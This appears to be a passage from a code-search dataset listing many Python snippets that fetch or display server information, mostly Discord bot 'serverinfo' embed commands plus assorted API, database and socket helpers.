embed.set_footer(text=f\"Requested by {ctx.author.name}\")\n embed.set_thumbnail(url=ctx.guild.icon_url)\n fields = [\n (\"Server ID\", id, True),\n (\"Server Region\", region.capitalize(), True),\n (\"Owner\", owner, True),\n (\"Member Count\", memberCount, True),\n (\"Text Channels\", textChannels, True),\n (\"Voice Channels\", voiceChannels, True),\n (\"Role Count\", roles, True),\n (\"Created on\", guildCreatedate, True),\n ]\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n await ctx.send(embed=embed)", "async def server_info(self, ctx):\n guild = ctx.guild\n id = guild.id\n boost_count = guild.premium_subscription_count\n region = str(guild.region)\n channels = len(guild.channels)\n vc = len(guild.voice_channels)\n text_channels = len(guild.text_channels)\n emoji_limit = guild.emoji_limit\n bitrate = guild.bitrate_limit\n filesize = guild.filesize_limit\n members = str(len(guild.members))\n owner = guild.owner.name\n icon = guild.icon_url\n roles = len(guild.roles)\n banned = len(await guild.bans())\n invites = len(await guild.invites())\n created = str(guild.created_at)\n embed = discord.Embed(\n title=guild.name,\n description=\"Server Info:\",\n color=discord.Colour.purple()\n )\n embed.set_thumbnail(url=icon)\n embed.add_field(name=\"ID:\", value=str(id))\n embed.add_field(name=\"Owner: \", value=owner)\n embed.add_field(name=\"Region: \", value=region)\n embed.add_field(name=\"created at: \", value=created)\n embed.add_field(name=\"Boost count: \", value=boost_count)\n embed.add_field(name=\"Members: \", value=members)\n embed.add_field(name=\"Roles:\", value=str(roles))\n embed.add_field(name=\"Channels:\", value=str(channels))\n embed.add_field(name=\"Text Channels:\", value=str(text_channels))\n embed.add_field(name=\"Voice Channels:\", value=str(vc))\n embed.add_field(name=\"Emoji Limit:\", value=str(emoji_limit))\n embed.add_field(name=\"Max Bitrate:\", value=bitrate)\n embed.add_field(name=\"Max Filesize:\", value=filesize)\n embed.add_field(name=\"Banned Members:\", value=str(banned))\n embed.add_field(name=\"Active Invites:\", 
value=str(invites))\n await ctx.send(\"\", embed=embed)", "def get_servers_info(self):\n return self.mrr_obj.get('/info/servers')", "async def serverinfo(self, context: Context) -> None:\n roles = [role.name for role in context.guild.roles]\n if len(roles) > 50:\n roles = roles[:50]\n roles.append(f\">>>> Displaying[50/{len(roles)}] Roles\")\n roles = \", \".join(roles)\n\n embed = discord.Embed(\n title=\"**Server Name:**\", description=f\"{context.guild}\", color=0x9C84EF\n )\n if context.guild.icon is not None:\n embed.set_thumbnail(url=context.guild.icon.url)\n embed.add_field(name=\"Server ID\", value=context.guild.id)\n embed.add_field(name=\"Member Count\", value=context.guild.member_count)\n embed.add_field(\n name=\"Text/Voice Channels\", value=f\"{len(context.guild.channels)}\"\n )\n embed.add_field(name=f\"Roles ({len(context.guild.roles)})\", value=roles)\n embed.set_footer(text=f\"Created at: {context.guild.created_at}\")\n await context.send(embed=embed)", "def get_server_info(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_GetServerInfo', self.handle))", "def serverinfo( self, mess, args):\n version = open('/proc/version').read().strip()\n loadavg = open('/proc/loadavg').read().strip()\n\n return '%snn%s' % ( version, loadavg, )", "def serverinfo( self, mess, args):\n version = open('/proc/version').read().strip()\n loadavg = open('/proc/loadavg').read().strip()\n\n return '%s\\n\\n%s' % ( version, loadavg, )", "def get_server_info_list(self):\n # TODO: 不要では?特に理由がなければ削除する\n result = []\n if self._server_sock is not None:\n result.append(\"Sever address: %s\" %\n str(self._server_sock.getsockname()))\n else:\n result.append(\"Sever address: Not initialized yet.\")\n result.append(\"Handler: %s\" %\n str(self._data_handler.__class__))\n result.append(\"Sessions: %d\" % len(self._sessions))\n for idx, session_thread in enumerate(self._sessions):\n result.append(\"Session[%d]: %s\" % (\n idx, str(session_thread.client_address)))\n return result", "def redis_info(self):\n def func(server):\n return server.info()\n self.__run_redis_cmd(func)", "def info(self):\n self._info()", "def get_server(self):\n\n pass", "def info(self):\n return requests.get(self.info_url + self.pid).json()", "def test_server_info(self):\n pass", "def info(self):\n return self.client.call('GET', self.name + 'info')", "def get_db_info(self):\n db_info = {}\n db_info[\"Mongo Server Info\"] = self.db_client.server_info()\n return db_info", "def get_server_info(self):\n raise NotImplementedError('Database.get_version()')", "def get_info(self):\n pass", "def get_info(self):\n pass", "def info(self) -> dict:", "def info() -> None:", "def info(self):\r\n return self._get('info', {})", "def details(self):\n return self.sock.getsockname()", "def getInfo():", "async def server_info(self, ctx):\n if ctx.author.bot == False:\n embed = discord.Embed(title= ctx.guild.name,\n colour= ctx.guild.owner.colour\n )\n\n embed.set_thumbnail(url=ctx.guild.icon_url)\n\n statuses = [len(list(filter(lambda m: str(m.status) == \"online\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"idle\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"dnd\", ctx.guild.members))),\n len(list(filter(lambda m: str(m.status) == \"offline\", ctx.guild.members)))]\n\n fields =[\n (\"Owner\", f'{ctx.guild.owner.mention}', True),\n (\"Region\", f'{str(ctx.guild.region).title()}', True),\n (\"Created on\", ctx.guild.created_at.strftime(\"%b %d, %Y \"), True),\n \n (\"Members\", 
f\"{len(list(filter(lambda m: not m.bot, ctx.guild.members)))} | {len(list(filter(lambda m: m.bot, ctx.guild.members)))}\", True),\n (\"Roles\", len(ctx.guild.roles), True),\n (\"Banned\", len(await ctx.guild.bans()), True),\n\n (\"Emojis\", len(ctx.guild.emojis), True),\n (\"Text channels\", len(ctx.guild.text_channels), True),\n (\"Voice channels\", len(ctx.guild.voice_channels), True),\n \n\n (\"\\u200b\",f\"**🟢 {statuses[0]}|🟠 {statuses[1]}|🔴 {statuses[2]}|⚪ {statuses[3]}**\", False)\n ]\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n await ctx.send(embed=embed)", "def getHostInfo():", "def rpc_info():", "def info(self):", "def info(self):", "def info(client):\n\n return client.get_info()", "def __repr__(self):\n return \"API Server Running at: \" + str(self.host) + \" on Port:\" + str(self.port) \\\n + \"/records: Return records\\n\" + \"/response_time: Return All response_times\\n\" \\\n + \"/response_time/max: Return max response_times\\n\" \\\n + \"/response_time/min: Return min response_times\\n\" \\\n + \"/response_time/average: Return average response_times\\n\" \\\n + \"/response_time/all_stats: Return tuple of(min, max, average) response_times\\n\"", "def info(self):\n resp = requests.get(\"%s/api/info\"%self.urlbase, verify=False)\n return resp.json", "def info(self):\n return {}", "def server(self):\n return self.the_server", "def info(self, *path):\n self._download_server_info()\n if self._info:\n return self._info.get(path, {})\n path = list(path)\n path[-1] += \".info\"\n t = self._open(*path)\n if t.status_code == 200:\n return json.loads(t.text)\n else:\n return {}", "def info(self):\n pp = pprint.PrettyPrinter(indent=4)\n print_text_box('Info')\n pp.pprint(self.manager.data[\"info\"])\n print('')", "def info(self) -> str:\n return pulumi.get(self, \"info\")", "async def info(self, ctx):\n self.logger.info(misolog.format_log(ctx, f\"\"))\n appinfo = await self.client.application_info()\n membercount = sum(1 for x in self.client.get_all_members())\n info_embed = discord.Embed(title=f\"Miso Bot | version {main.version}\",\n description=f\"Created by {appinfo.owner.mention}\\n\\n\"\n f\"Use `{self.client.command_prefix}help` to get the list of commands, \"\n f\"or visit the documention website for more help.\"\n f\"\\n\\nCurrently active in **{len(self.client.guilds)}** \"\n f\"servers totaling **{membercount}** unique users\",\n colour=discord.Colour.red())\n\n # info_embed.set_footer(text=f'version 2.0')\n info_embed.set_thumbnail(url=self.client.user.avatar_url)\n info_embed.add_field(name='Github', value='https://github.com/joinemm/miso-bot', inline=False)\n info_embed.add_field(name='Documentation', value=\"http://joinemm.me/misobot\", inline=False)\n info_embed.add_field(name='Patreon', value=\"https://www.patreon.com/joinemm\", inline=False)\n await ctx.send(embed=info_embed)", "def get_info(self) -> str:\n return self.info", "def get(self):\n try:\n server_response = self.get_unauthenticated_request(self.baseurl)\n except ServerResponseError as e:\n if e.code == \"404003\":\n raise ServerInfoEndpointNotFoundError(e)\n if e.code == \"404001\":\n raise EndpointUnavailableError(e)\n raise e\n\n self._info = ServerInfoItem.from_response(server_response.content, self.parent_srv.namespace)\n return self._info", "async def serverinfo(self, ctx):\n guild = ctx.guild\n\n embed = discord.Embed()\n embed.title = str(guild)\n if guild.icon_url is not None:\n embed.description = '**ID**: {0.id}\\n[Icon 
URL]({0.icon_url})'.format(guild)\n embed.set_thumbnail(url=guild.icon_url)\n else:\n embed.description = '**ID**: {0.id}'.format(guild)\n\n if guild.me.permissions_in(ctx.channel).kick_members and ctx.author.permissions_in(ctx.channel).kick_members:\n dead_members = await ctx.guild.estimate_pruned_members(days=7)\n members = '{} members, {} of which were active in the past 7 days'.format(guild.member_count,\n guild.member_count - dead_members)\n else:\n members = guild.member_count\n\n embed.add_field(name='Members', value=members)\n\n roles = [x.mention for x in guild.role_hierarchy if not x.is_default()]\n if roles: # only show roles if the server has any\n roles = ', '.join(roles)\n if len(roles) <= 1024: # deal with limits\n embed.add_field(name='Roles', value=roles)\n\n channels = [x[1] for x in sorted([(x.position, x.mention) for x in guild.channels if\n isinstance(x, discord.TextChannel)])]\n channels = ', '.join(channels)\n if len(channels) <= 1024:\n embed.add_field(name='Text channels', value=channels)\n\n if guild.verification_level == discord.VerificationLevel.none:\n verification_level = 'None'\n elif guild.verification_level == discord.VerificationLevel.low:\n verification_level = 'Low'\n elif guild.verification_level == discord.VerificationLevel.medium:\n verification_level = 'Medium'\n elif guild.verification_level == discord.VerificationLevel.high:\n verification_level = '(╯°□°)╯︵ ┻━┻'\n else:\n verification_level = '┻━┻ ミヽ(ಠ益ಠ)ノ彡┻━┻'\n\n if guild.explicit_content_filter == discord.ContentFilter.disabled:\n explicit_level = 'Don\\'t scan any messages'\n elif guild.explicit_content_filter == discord.ContentFilter.no_role:\n explicit_level = 'Scan messages from members without a role'\n else:\n explicit_level = 'Scan messages sent by all members'\n\n info = '**AFK channel**: {0.afk_channel}\\n**AFK timeout**: {0.afk_timeout} seconds\\n' \\\n '**Owner**: {0.owner.mention}\\n**Region**: `{0.region.value}`\\n' \\\n '**Verification level**: {1}\\n**Explicit content filter**: {2}'.format(guild, verification_level,\n explicit_level)\n\n embed.add_field(name='Other miscellaneous info', value=info)\n\n embed.timestamp = guild.created_at\n embed.set_footer(text='Created on')\n\n if ctx.channel.permissions_for(ctx.guild.me).embed_links:\n if ctx.author.id == self.liara.user.id:\n await ctx.message.edit(embed=embed)\n else:\n await ctx.send(embed=embed)\n else:\n await ctx.send('Unable to post serverinfo, please allow the Embed Links permission.')", "def info(self):\n return self.__dict__[self.sid]", "def info(self):\n return self._fetch_json('/api/info')", "def info(self):\n path = self._get_path('info')\n \n response = self._GET(path)\n self._set_attrs_to_values(response)\n return response", "def get_node_details(self, node):\n node_details = self.parser.find_server_by_ip(node.get('ip')) or \\\n self.parser.find_server_by_hostname(node.get('host'))\n\n return node_details", "def SetServerInformation(self, server, port):\n self.hostname = server\n self.port = port", "def default_server_info():\n # If not set or purposely set = None, then set default\n if MDC.get('server') is None:\n try:\n server = socket.getfqdn()\n except Exception:\n try:\n server = socket.gethostname()\n except Exception:\n server = ''\n MDC.put('server', server)\n if MDC.get('serverIPAddress') is None:\n try:\n server_ip_address = socket.gethostbyname(MDC.get('server'))\n except Exception:\n server_ip_address = \"\"\n MDC.put('serverIPAddress', server_ip_address)", "def fp_meta(self):\n for server in 
self.machines:\n s = self.machines[server]\n print \"%s: %s (%s)\" % (s.id, s.adminPass, s)", "def getInfo(self):\n return self.info", "def sipserver_status(self) -> str:", "def get_info(self):\n return \"TODO !\"", "def info(self):\n _, data = yield from self.transport.perform_request('GET', '/')\n return data", "def _request_bootstrap_server_info() -> str:\n if __debug__:\n logger.info(\"Requesting bootstrap server...\")\n req = BootstrapServerRequest()\n DistroStreamClientHandler.request(req)\n\n # Retrieve answer\n req.wait_processed()\n error = req.get_error_code()\n if error != 0:\n raise BackendException(error, req.get_error_msg())\n\n # Parse answer\n answer = req.get_response_msg()\n if __debug__:\n logger.debug(\"Retrieved bootstrap server information: %s\", answer)\n\n return answer", "def __repr__(self):\n return 'Server %s at Node %s' % (self.id_number,\n self.node.id_number)", "def info(self) -> str:\n return self._info", "def info(self) -> str:\n return self._info", "def info(self):\n return self._info", "def get_info(self) -> str:\n raise NotImplementedError()", "def get_info(self):\n return {}", "def server_info(self, **kwargs):\n kwargs['_return_http_data_only'] = True\n if kwargs.get('callback'):\n return self.server_info_with_http_info(**kwargs)\n else:\n (data) = self.server_info_with_http_info(**kwargs)\n return data", "def show_info(self):\n print 'Querying the station for the configuration...'\n config = self.station.getConfig()\n for key in sorted(config):\n print '%s: %s' % (key, config[key])", "async def info(self):\n # [p]info\n\n await self.bot.say(strings.info.format(\n CacheAPI.get(key='dwarf_repository'),\n CacheAPI.get(key='dwarf_invite_link')))", "def info(self):\n return self._info", "def get_server():\n pass", "def save(self):\n return {\n \"type\": \"Server\",\n \"fd\": self.socket.fileno()\n }", "def get_server(self):\n return self.__server", "def info(self):\n\n if self.running:\n return INFO_RUNNING_FORMAT.format(**self.__dict__)\n else:\n return INFO_ENDED_FORMAT.format(**self.__dict__)", "def info(self) -> Info:\n raw = self._call('GET', 'info')\n return Info.parse_raw(raw)", "def get_info(self):\n return None", "def getInfo(self):\n return self._info", "def info(self) -> Optional[Dict[str, Any]]:\n return self._state.get(\"info\", None)", "def server_info(subresource, server, proxyfilename, baseurl):\n server = HTTPRequests(url=server, localcert=proxyfilename, localkey=proxyfilename, version='HC')\n\n dictresult, status, reason = server.get(baseurl, {'subresource' : subresource})\n\n return dictresult['result'][0]", "def server(self):\n return self._server", "def server(self):\n return self._server", "def get_info():\n message = \"GET information about glancesync server\"\n\n logger_api.info(message)\n\n message = '''\n {\n \"id\": \"%s\",\n \"owner\": \"%s\",\n \"status\": \"%s\",\n \"version\": \"%s\",\n \"updated\": \"%s\",\n \"runningfrom\": \"%s\",\n \"href\": \"%s\"\n }\n ''' % (ID, OWNER, STATUS, VERSION, UPDATED, RUNNINGFROM, API_INFO_URL)\n\n resp = make_response(message, httplib.OK)\n resp.headers[SERVER_HEADER] = SERVER\n resp.headers[CONTENT_TYPE] = JSON_TYPE\n\n logger_api.info('Return result: %s', message)\n\n return resp", "async def serverinfo(ctx):\n server = ctx.message.server\n online = len([m.status for m in server.members\n if m.status == discord.Status.online or\n m.status == discord.Status.idle])\n total_users = len(server.members)\n text_channels = len([x for x in server.channels\n if x.type == discord.ChannelType.text])\n 
voice_channels = len(server.channels) - text_channels\n passed = (ctx.message.timestamp - server.created_at).days\n created_at = (\"Since {}. That's over {} days ago!\"\n \"\".format(server.created_at.strftime(\"%d %b %Y %H:%M\"), passed))\n\n colour = ''.join([random.choice('0123456789ABCDEF') for x in range(6)])\n colour = int(colour, 16)\n embed = discord.Embed(description = created_at, colour = discord.Colour(value = colour), timestamp = datetime.datetime.utcnow())\n embed.add_field(name = \"Region\", value = str(server.region))\n embed.add_field(name = \"Users Online\", value = \"{}/{}\".format(online, total_users))\n embed.add_field(name = \"Text Channels\", value = text_channels)\n embed.add_field(name = \"Voice Channels\", value = voice_channels)\n embed.add_field(name = \"Roles\", value = len(server.roles))\n embed.add_field(name = \"Owner\", value = str(server.owner))\n embed.set_footer(text = \"Server ID: \" + server.id)\n embed.add_field(name = \"AFK Timeout\", value = \"{} minutes\".format(server.afk_timeout/60).replace(\".0\", \"\"))\n embed.add_field(name = \"AFK Channel\", value = str(server.afk_channel))\n embed.add_field(name = \"Verification Level\", value = str(server.verification_level))\n embed.set_footer(text= \"{} | Requested by: {}\".format(version, ctx.message.author))\n\n if server.icon_url:\n embed.set_author(name = server.name, url = server.icon_url)\n embed.set_thumbnail(url = server.icon_url)\n else:\n embed.set_author(name=server.name)\n\n await bot.say(embed = embed)", "def get_server_metadata(self, name):\n raise NotImplementedError", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def device_info(self) -> dict:\n return {\n \"connections\": {(DOMAIN, self._unique_id)},\n \"name\": self._host,\n \"manufacturer\": \"IMAP E-Mail\",\n \"sw_version\": VERSION,\n }", "def get_description(self):\n return self['host_name']", "def server_type(self):\n ...", "async def info(self, ctx):\n\t\tembed = discord.Embed(\n\t\t\tdescription=\"Created By Seperoph#1399 and AkaBaka#4654\",\n\t\t\tcolor=config[\"success\"]\n\t\t)\n\t\tembed.set_author(\n\t\t\tname=\"Bot Information\"\n\t\t)\n\t\tembed.add_field(\n\t\t\tname=\"Head Programmers:\",\n\t\t\tvalue=\"Seperoph#1399 and AkaBaka#4654\",\n\t\t\tinline=True\n\t\t)\n\t\tembed.add_field(\n\t\t\tname=\"Python Version:\",\n\t\t\tvalue=f\"{platform.python_version()}\",\n\t\t\tinline=True\n\t\t)\n\t\tawait ctx.respond(embed=embed)", "def info(self):\n import string\n results = self.info_list()\n labels = \"%-8s %-9s %-4s %-8s %-8s %-4s\" % \\\n ('MACHINE','CPU','GHZ','MB TOTAL',\n 'MB FREE','LOAD')\n print labels\n for i in range(len(self.workers)):\n name = string.split(self.workers[i].host,'.')[0]\n res = results[i]\n s = \"%-8s %2dx%-6s %4.1f %8.1f %8.1f %4.2f\" % \\\n (name[-8:], res['cpu_count'],res['cpu_type'][-6:], \\\n res['cpu_speed'],res['mem_total'],res['mem_free'],\\\n res['load_1'])\n print s", "def info(self):\n self.update_info()\n print('Number of electrodes: ' + str(self.n_elecs))\n print('Recording time in seconds: ' + str(self.dur))\n print('Sample Rate in Hz: '+ str(self.sample_rate))\n print('Number of sessions: ' + str(self.n_sessions))\n print('Date created: ' + str(self.date_created))\n print('Meta data: ' + str(self.meta))", "def 
info() -> Dict[str, Any]:", "def describe(self) -> None:\n return {\n 'cluster_metadata': self.cluster_metadata,\n 'master_url': self.master_url\n }", "async def _info(self, ctx: Context):\n\n embed = discord.Embed(colour=await ctx.embed_colour())\n\n perm_int = discord.Permissions(268494928)\n\n data = await self.bot.application_info()\n invite_url = discord.utils.oauth_url(data.id, permissions=perm_int)\n\n embed.description = (\n \"TvM Assistant is a Discord bot with utility commands to make hosting TvMs easier.\"\n \"\\n\\nSome of the bot features include:\"\n \"\\n\\n- Setup roles and channel creation\"\n \"\\n- Management of sign-ups, sign-outs, spectators and replacements\"\n \"\\n- In-built logging to detect and ignore private channels\"\n \"\\n- Quick creation of player, mafia and spectator chats\"\n \"\\n- Vote counts and time since day/night started\"\n )\n\n links = (\n f\"\\n- [Invite to your server]({invite_url})\"\n f\"\\n- [Quickstart]({QUICKSTART})\"\n f\"\\n- [Commands Reference]({COMMANDS_REFERENCE})\"\n f\"\\n- [Source Code]({SOURCE_CODE})\"\n )\n\n embed.add_field(name=\"\\u200b\\nQuick Links\", value=links)\n embed.set_author(name=f\"About {ctx.me.name}\", icon_url=ctx.me.avatar_url)\n\n await ctx.send(embed=embed)", "def show_hostname(self):\n if self.hostname is None:\n self.get_version()\n print self.hostname", "def server_name(self) -> str:\n return pulumi.get(self, \"server_name\")", "def manage_info():", "def info(self):\n return self.info_text", "def get_host_stats(self):\n status, data, errors, messages = self._make_get_request(CraftyAPIRoutes.SERVER_STATS)\n \n if status == 200:\n return data\n elif status == 500:\n self._check_errors(errors, messages)", "def server():", "def server():", "async def _serverinfo(self, ctx, details: bool = True):\n # if not id:\n # guild = ctx.guild\n # else:\n # try:\n # guild = ctx.bot.get_guild(int(id))\n # if not guild:\n # guild = await ctx.bot.fetch_guild(int(id))\n # except Exception as e:\n # await ctx.send(f\"Error: {e}\")\n\n guild = ctx.guild\n online = len([m.status for m in guild.members if m.status != discord.Status.offline])\n if not details:\n desc = \"Created at {date}\".format(date=guild.created_at.strftime(\"%d %b %Y %H:%M\"))\n data = discord.Embed(color=ctx.guild.me.top_role.color, description=desc)\n data.set_author(name=guild.name)\n data.set_thumbnail(url=guild.icon_url)\n data.add_field(name=\"Region\", value=bold(guild.region))\n data.add_field(name=\"Users Online\", value=bold(f\"{online}/{guild.member_count}\"))\n data.add_field(name=\"Roles\", value=bold(len(guild.roles)))\n data.add_field(name=\"Owner\", value=bold(str(guild.owner)))\n data.set_footer(text=f\"ID: {guild.id}\")\n\n else:\n passed = (ctx.message.created_at - guild.created_at).days\n created_at = (\"Created on {date}. 
That's **{num}** days ago!\").format(\n date=guild.created_at.strftime(\"%d %b %Y %H:%M\"), num=passed,\n )\n total_users = guild.member_count\n text_channels = len(guild.text_channels)\n voice_channels = len(guild.voice_channels)\n\n def _size(num: int):\n for unit in [\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\"]:\n if abs(num) < 1024.0:\n return \"{0:.1f}{1}\".format(num, unit)\n num /= 1024.0\n return \"{0:.1f}{1}\".format(num, \"YB\")\n\n def _bitsize(num: int):\n for unit in [\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\"]:\n if abs(num) < 1000.0:\n return \"{0:.1f}{1}\".format(num, unit)\n num /= 1000.0\n return \"{0:.1f}{1}\".format(num, \"YB\")\n\n shard_info = (\n \"\\nShard ID: **{shard_id}/{shard_count}**\".format(\n shard_id=guild.shard_id + 1,\n shard_count=ctx.bot.shard_count,\n )\n if ctx.bot.shard_count > 1\n else \"\"\n )\n online_stats = {\n \"Humans: \": lambda x: not x.bot,\n \" • Bots: \": lambda x: x.bot,\n \"\\N{LARGE GREEN CIRCLE}\": lambda x: x.status is discord.Status.online,\n \"\\N{LARGE ORANGE CIRCLE}\": lambda x: x.status is discord.Status.idle,\n \"\\N{LARGE RED CIRCLE}\": lambda x: x.status is discord.Status.do_not_disturb,\n \"\\N{MEDIUM WHITE CIRCLE}\": lambda x: x.status is discord.Status.offline,\n \"\\N{LARGE PURPLE CIRCLE}\": lambda x: any(\n a.type is discord.ActivityType.streaming for a in x.activities\n ),\n \"\\N{MOBILE PHONE}\": lambda x: x.is_on_mobile(),\n }\n member_msg = (\"Users online: **{onlineusr}/{total_users}**\\n\").format(\n onlineusr=online, total_users=total_users\n )\n count = 1\n for emoji, value in online_stats.items():\n try:\n num = len([m for m in guild.members if value(m)])\n except Exception as error:\n print(error)\n continue\n else:\n member_msg += f\"{emoji} {bold(num)} \" + (\n \"\\n\" if count % 2 == 0 else \"\"\n )\n count += 1\n\n vc_regions = {\n \"vip-us-east\": \"__VIP__ US East \" + \"\\U0001F1FA\\U0001F1F8\",\n \"vip-us-west\": \"__VIP__ US West \" + \"\\U0001F1FA\\U0001F1F8\",\n \"vip-amsterdam\": \"__VIP__ Amsterdam \" + \"\\U0001F1F3\\U0001F1F1\",\n \"eu-west\": \"EU West \" + \"\\U0001F1EA\\U0001F1FA\",\n \"eu-central\": \"EU Central \" + \"\\U0001F1EA\\U0001F1FA\",\n \"europe\": \"Europe \" + \"\\U0001F1EA\\U0001F1FA\",\n \"london\": \"London \" + \"\\U0001F1EC\\U0001F1E7\",\n \"frankfurt\": \"Frankfurt \" + \"\\U0001F1E9\\U0001F1EA\",\n \"amsterdam\": \"Amsterdam \" + \"\\U0001F1F3\\U0001F1F1\",\n \"us-west\": \"US West \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-east\": \"US East \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-south\": \"US South \" + \"\\U0001F1FA\\U0001F1F8\",\n \"us-central\": \"US Central \" + \"\\U0001F1FA\\U0001F1F8\",\n \"singapore\": \"Singapore \" + \"\\U0001F1F8\\U0001F1EC\",\n \"sydney\": \"Sydney \" + \"\\U0001F1E6\\U0001F1FA\",\n \"brazil\": \"Brazil \" + \"\\U0001F1E7\\U0001F1F7\",\n \"hongkong\": \"Hong Kong \" + \"\\U0001F1ED\\U0001F1F0\",\n \"russia\": \"Russia \" + \"\\U0001F1F7\\U0001F1FA\",\n \"japan\": \"Japan \" + \"\\U0001F1EF\\U0001F1F5\",\n \"southafrica\": \"South Africa \" + \"\\U0001F1FF\\U0001F1E6\",\n \"india\": \"India \" + \"\\U0001F1EE\\U0001F1F3\",\n \"dubai\": \"Dubai \" + \"\\U0001F1E6\\U0001F1EA\",\n \"south-korea\": \"South Korea \" + \"\\U0001f1f0\\U0001f1f7\",\n }\n verif = {\n \"none\": \"0 - None\",\n \"low\": \"1 - Low\",\n \"medium\": \"2 - Medium\",\n \"high\": \"3 - High\",\n \"extreme\": \"4 - Extreme\",\n }\n features = {\n \"PARTNERED\": \"Partnered\",\n \"VERIFIED\": \"Verified\",\n \"DISCOVERABLE\": \"Server 
Discovery\",\n \"FEATURABLE\": \"Featurable\",\n \"PUBLIC\": \"Public\",\n \"PUBLIC_DISABLED\": \"Public disabled\",\n \"INVITE_SPLASH\": \"Splash Invite\",\n \"VIP_REGIONS\": \"VIP Voice Servers\",\n \"VANITY_URL\": \"Vanity URL\",\n \"MORE_EMOJI\": \"More Emojis\",\n \"COMMERCE\": \"Commerce\",\n \"NEWS\": \"News Channels\",\n \"ANIMATED_ICON\": \"Animated Icon\",\n \"BANNER\": \"Banner Image\",\n \"MEMBER_LIST_DISABLED\": \"Member list disabled\",\n }\n guild_features_list = [\n f\"✅ {name}\" for feature, name in features.items() if feature in guild.features\n ]\n joined_on = (\n \"{bot_name} joined this server on {bot_join}. That's {since_join} days ago!\"\n ).format(\n bot_name=ctx.bot.user.name,\n bot_join=guild.me.joined_at.strftime(\"%d %b %Y %H:%M:%S\"),\n since_join=(ctx.message.created_at - guild.me.joined_at).days,\n )\n data = discord.Embed(\n description=(f\"{guild.description}\\n\\n\" if guild.description else \"\") + created_at,\n colour=ctx.guild.me.top_role.color,\n )\n data.set_author(\n name=guild.name,\n icon_url=\"https://cdn.discordapp.com/emojis/457879292152381443.png\"\n if \"VERIFIED\" in guild.features\n else \"https://cdn.discordapp.com/emojis/508929941610430464.png\"\n if \"PARTNERED\" in guild.features\n else discord.Embed.Empty,\n )\n if guild.icon_url:\n data.set_thumbnail(url=guild.icon_url)\n data.add_field(name=\"Members:\", value=member_msg)\n data.add_field(\n name= \"Channels:\",\n value= (\n \"\\N{SPEECH BALLOON} Text: {text}\\n\"\n \"\\N{SPEAKER WITH THREE SOUND WAVES} Voice: {voice}\"\n ).format(text=bold(text_channels), voice=bold(voice_channels)),\n )\n data.add_field(\n name=\"Utility:\",\n value=(\n \"Owner: {owner}\\nVoice region: {region}\\nVerif. level: {verif}\\nServer ID: {id}{shard_info}\"\n ).format(\n owner=bold(str(guild.owner)),\n region=bold(f\"{vc_regions.get(str(guild.region)) or str(guild.region)}\"),\n verif=bold(verif[str(guild.verification_level)]),\n id=bold(str(guild.id)),\n shard_info=shard_info,\n ),\n inline=False,\n )\n data.add_field(\n name=\"Misc:\",\n value=(\n \"AFK channel: {afk_chan}\\nAFK timeout: {afk_timeout}\\nCustom emojis: {emoji_count}\\nRoles: {role_count}\"\n ).format(\n afk_chan=bold(str(guild.afk_channel))\n if guild.afk_channel\n else bold(\"Not Set\"),\n afk_timeout=bold(guild.afk_timeout),\n emoji_count=bold(len(guild.emojis)),\n role_count=bold(len(guild.roles)),\n ),\n inline=False,\n )\n if guild_features_list:\n data.add_field(name=\"Server features:\", value=\"\\n\".join(guild_features_list))\n if guild.premium_tier != 0:\n nitro_boost = (\n \"Tier {boostlevel} with {nitroboosters} boosters\\n\"\n \"File size limit: {filelimit}\\n\"\n \"Emoji limit: {emojis_limit}\\n\"\n \"VCs max bitrate: {bitrate}\"\n ).format(\n boostlevel=bold(str(guild.premium_tier)),\n nitroboosters=bold(guild.premium_subscription_count),\n filelimit=bold(_size(guild.filesize_limit)),\n emojis_limit=bold(str(guild.emoji_limit)),\n bitrate=bold(_bitsize(guild.bitrate_limit)),\n )\n data.add_field(name=\"Nitro Boost:\", value=nitro_boost)\n if guild.splash:\n data.set_image(url=guild.splash_url_as(format=\"png\"))\n data.set_footer(text=joined_on)\n\n await ctx.send(embed=data)", "def get_name(self):\n \n return 'TCP/IP Server'", "def get_ded_info(server, show=False):\n # start Requests session\n sc = requests.Session()\n\n # import cookies from Firefox\n sc.cookies.update(get_cookies('imhsc.imhadmin.net'))\n\n # send request\n vpx = sc.get('https://imhsc.imhadmin.net/index.php',\n params={'v': \"Dedicated\", 'selectServer': 
server})\n\n # check if login failed\n check_sc_login(vpx.text)\n\n # parse with BS4\n bs = BeautifulSoup(vpx.text, \"xml\")\n\n # server=0 ip=4 net=5 psc=6 user=11 type=14\n trr = bs.tbody.find_all('tr')\n if len(trr) > 0:\n tsrv = {\n 'hostname': trr[0].find_all('td')[0].string,\n 'ip': trr[0].find_all('td')[2].string,\n 'net': trr[0].find_all('td')[3].string,\n 'psc': trr[0].find_all('td')[4].a.string,\n 'user': trr[0].find_all('td')[9].string,\n 'type': trr[0].find_all('td')[12].string,\n 'status': trr[0].find_all('td')[13].string.strip()\n }\n else:\n tsrv = None\n\n if show:\n if tsrv:\n print(\"[%(hostname)s] IP: %(ip)s (%(net)s) / PSC: %(psc)s / User: %(user)s / Type: %(type)s / Status: %(status)s\" % tsrv)\n else:\n print(\"!! Server '%s' not found\" % (server))\n\n return tsrv" ]
